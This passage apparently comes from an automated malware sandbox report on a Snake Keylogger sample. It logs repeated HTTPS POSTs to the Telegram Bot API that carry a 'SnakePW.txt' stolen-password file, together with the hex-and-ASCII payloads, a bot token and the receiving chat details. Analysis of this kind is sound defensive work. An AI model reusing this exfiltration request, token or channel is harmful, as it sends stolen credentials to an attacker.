                            2022-06-26 07:32:54 UTC62INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66783,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228774,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            37192.168.2.549809149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:54 UTC62OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ddc4cf8a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:54 UTC62OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 64 63 34 63 66 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ddc4cf8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:54 UTC63INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:54 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:54 UTC63INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66784,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228774,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            38192.168.2.549810149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:55 UTC64OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756de5d655e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:55 UTC64OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 35 64 36 35 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756de5d655eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:55 UTC65INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:55 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:55 UTC65INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66785,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228775,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            39192.168.2.549812149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:55 UTC65OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dea2895d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:55 UTC66OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 61 32 38 39 35 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dea2895dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:56 UTC66INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:56 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:56 UTC67INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66786,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            4192.168.2.549772149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:39 UTC6OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d535c47f
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:39 UTC7OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 33 35 63 34 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d535c47fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:40 UTC7INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:40 UTC7INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66750,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            40192.168.2.549814149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:56 UTC67OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756dee54c34
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:56 UTC67OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 65 65 35 34 63 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756dee54c34Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:56 UTC68INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:56 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:56 UTC68INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66787,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            41192.168.2.549815149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:56 UTC69OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756df23493c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:56 UTC69OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 32 33 34 39 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756df23493cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:56 UTC70INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:56 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:56 UTC70INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66788,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228776,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            42192.168.2.549816149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:56 UTC70OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756df57bcdb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:56 UTC71OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 66 35 37 62 63 64 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756df57bcdbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:57 UTC71INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:57 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:57 UTC72INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66789,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228777,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
